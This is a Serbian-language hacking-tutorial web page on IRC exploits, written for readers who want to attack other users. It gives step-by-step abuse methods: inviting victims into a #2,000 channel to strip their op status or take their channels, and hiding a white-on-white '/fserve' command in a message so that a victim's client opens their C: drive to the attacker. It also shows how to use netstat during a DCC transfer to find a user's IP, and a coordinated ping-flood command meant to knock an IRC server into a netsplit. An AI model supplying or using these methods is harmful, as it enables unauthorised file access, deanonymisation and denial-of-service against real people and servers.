Ponedeljak, 2018-11-19, 10:03 AM
Welcome Guest | RSS
Biohazard Hacking Team
Main | Hack Tutorials | Registration | Login
Login form

Site menu
Catalog categories
Osnove [4]
Osnove o hakovanju
Hakovanje [9]
Hakovanje svega i svacega!
Virusi & Trojanci [5]
Naucite sta su i kako se prave!
Alati [5]
Naucite kako da koristite alate za hack
mIRC [2]
Naucite kako da mIRC pretvorite u oruzije!
Search
Site friends
Our poll
Oceni moj sajt
Total of answers: 537
Main » Articles » mIRC

IRC Exploits

Napomena: Zelim da istaknem da je ovaj tutorial namenjen samo u edukativne svrhe i da autor ovog teksta nije odgovoran za bilo kakvu stetu koju napravite primenom ovih informacija.

[Kanal #2,000 exploit]

Ukoliko se nalazite na nekom od irc servera i udjete u kanal #2,000 bicete izbaceni iz svih kanala u kojima se trenutno nalazite. Zapravo, ne stvarno izbaceni, vec ce liciti kao da ste sami napustili sve kanale. Kao da ste ukucali /part u svim kanalima u kojima se nalazite. Sto je ovo vazno? Pa, evo vam nekoliko stvari koje mozete uraditi sa ovim glupim bagom:

1. Pretpostavimo da na ircu postoji bot koga zelite da izbacite iz odredjenog kanala. Izbacicete ga bez problema, samo ga pozovite da udje u kanal #2,000.
2. Neko koga mrzite je dobio OP na nekom kanalu. Ukoliko bih on izasao, pa zatim ponovo usao u isti kanal izgubio bih svoj OP. To mozete vrlo jednostavno da iskoristite: pozovite ga u kanal: #2,000 i on ce automatski napustiti kanal u kome je imao OP. Sledeci put kad udje nece imati OP.
3. Ukoliko neko poseduje kanal, a nije ga reagistrovao i koji bi vi zeleli da preuzmete, mozete ga samo pozvati u kanal #2,000 i bice izbacen iz svih kanala. Sada samo registrujte kanal koji ste zeleli da mu preuzmete i vi ste sada vlasnik.
4. Ukoliko neko ima ukljucen "auto join on invite" potrebno je samo da ga pozovete (invite) na kanal i bice izbacen iz svih kanala na kojima se trenutno nalazi.
5. Mozete i sami smisliti neke nacine na koji ce te iskoristiti ovaj bag...

Potrebno je da kazem, da ovaj bag ne radi samo na pozivu u kanal #2,000. Mozete takodje koristiti i #2,100, #3,000, #4,000 itd... itd... uopste nije bitno.

Napominjem da na nekim IRC serverima ovaj trik nece da uspe, jer server kreira #2 kanal umesto #2,000 tj. brise sve nakon zareza.

[Away Log exploit]

Rec je o veoma jednostavnom i efikasnom nacinu da upadnete u neciji racunar na irc-u. Kako? Ovaj trik se radi kada je zrtva odsutna (away) i kada joj je LOG ukljucen. To znaci da ce sve poruke koje posaljete biti snimljene. Kada vidite da je zrtva away kao poruku joj posaljite sledeci red:

Heejjjj!!! 0,0| /fserve VASNICK 10 c:

Poruka ce se, kada je unesete, videti samo kao: Heejjjj!!!, a ostatak se nece videti, zato sto su i slova i pozadina bele boje. Sta sada? Nista... samo cekate i kada se zrtva vrati nazad (kada skine away opciju) komanda /fserve VASNICK 10 c: ce se automatski pokrenuti i vama ce se pojaviti prozor na kome ce pisati da zrtva zeli da chatuje sa vam. Kliknite na YES i Fserv prozor ce se pojaviti i dozvoliti vam pristup zrtvinom HARD DRIVE-u C:! Jedina je mana sto nista necete moci da brisete sa zrtvinog drajva vec samo da pretrazujete njegov drajv i da kopirate kod vas. FSERV komande mozete dobiti ukoliko ukucate Help.

[Pronalazenje IP adrese]

Ukoliko ste ikada bili na serverima poput irc.krstarica.com sigurno ste videli da se IP adresa ne moze pronaci komandom /dns NICK. Na ovakvim serverima skoro da je nemoguce pronaci IP adresu drugog korisnika. Ali ponavljam SKORO. IP adresu nekog korisnika na ovakvim serverima mozemo pronaci, ako ovom korisniku posaljemo neki fajl preko DCC-a i pritom u MS-DOSu unesemo komandu:

c:\windows\> netstat -n

Ovime ce te dobiti listu svih IP adresa i hostova na koji ste konektovani. Verovatno ce na listi biti IP adresa irc servera i naravno IP adresa vase zrtve. Potrebno je samo da istovremeno sa DCC-om pokrenete i netstat. Jedina mana ovoga je to sto ce i zrtva dobiti vasu IP adresu nakon sto izvrsite DCC Send, ali to je cena koju morate da platite. Ovaj trik vazi i za ICQ.

[Netsplit]

Netsplit je veoma komplikovano izvrsiti na danasnjim irc serverima, i mozda je jedini nacin da izvrsite netsplit na odredjenom serveru organizovani ping flud sa djavolski dobre konekcije. Dakle, potrebno je da vise korisnika u isto vreme (ne bas iste sekunde) ukucaju u MS-DOS Promptu:

c:\> ping -l 2800 -t -w 2000 irc.sdresaservera.com

Gde je irc.adresaservera.com host ili ip adresa ili host odredjenog irc servera (npr. irc.serbiancafe.com). Kada zapocnete ping flud, server ce ubrzo ostati u lag-u i doci ce do netsplita.


Category: mIRC | Added by: Neo_MaGGoT (2008-09-09) | Author: Predrag
Views: 1427 | Rating: 4.0/1 |
Total comments: 0
Only registered users can add comments.
[ Registration | Login ]
Copyright MyCorp © 2018
Website builderuCoz